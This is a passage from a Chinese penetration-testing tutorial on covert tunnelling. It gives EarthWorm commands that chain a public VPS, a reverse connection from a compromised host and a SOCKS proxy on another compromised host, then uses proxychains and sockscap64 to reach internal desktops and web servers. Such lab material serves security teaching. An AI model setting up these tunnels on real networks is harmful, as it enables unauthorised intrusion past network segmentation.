内网渗透测试：隐藏通讯隧道技术（下）(6)

连接成功。

（4）二级网络环境(b)

刚才那个适用于目标机器拥有一个外网IP地址的情况下，假设目标机器没有公网IP的情况下，我们该怎么办呢？

如上图环境，A主机既没有公网IP，但能访问外网，也不能访问内网资源，但可以访问内网B主机；内网B主机可以访问内网资源，但不能访问外网。假设我们已经获得了A主机和B主机的控制权限。

这里，我们不能像前一种情况那样通访问A主机来使用内网B主机上面架设的socks代理服务，可以通过访问vps来访问B主机上面架设的socks服务。

我们先在公网vps上传ew，在公网vps上面添加转接隧道，监听1080端口，并将1080端口收到的代理请求发送给1234端口，执行命令：

ew_for_linux64 -s lcx_listen -l 1080 -e 1234

然后将ew上传至内网B（192.168.52.138）主机，并利用ssocksd方式启动999端口的正向socks代理，执行命令：

ew_for_Win.exe -s ssocksd -l 999

最后，将ew上传到内网A主机上，在A主机（192.168.52.143）上利用lcx_slave方式，将公网vps的1234端口与内网B主机（192.168.52.138）的999端口连接起来，执行命令：

ew_for_Win.exe -s lcx_slave -d 39.xxx.xxx.210 -e 1234 -f 192.168.52.138 -g 999

此时，就可以设置proxychains等代理工具，通过访问公网vps的1080端口来使用架设在内网B主机上的socks代理服务了。如下设置proxychains：

访问内网机器（192.168.52.141）的远程桌面：

访问成功。除了proxychains，我们还可以使用proxifier、sockscap64等代理工具。如下，我们使用sockscap64来访问内网机器。

打开，sockscap64，将你想要进行代理的应用程序添加进去（方法很简单，找到可执行文件后拖进去即可），这里我把远程桌面程序添加了进去

点击上面的“代理”，进去添加一个代理，设置好vps或代理服务器的IP和指定的端口。

添加好后点击右下角“保存”。回到主界面，点击那个“闪电”形状的按钮，测试代理服务器能否正常连接

正常连接后，右击远程桌面程序，选择“在代理隧道中运行选中程序”，就可以访问内网远程机器了

同样的方法，我们也可以用浏览器来访问内网的资源，比如我们访问内网服务器192.168.52.128上面的资源：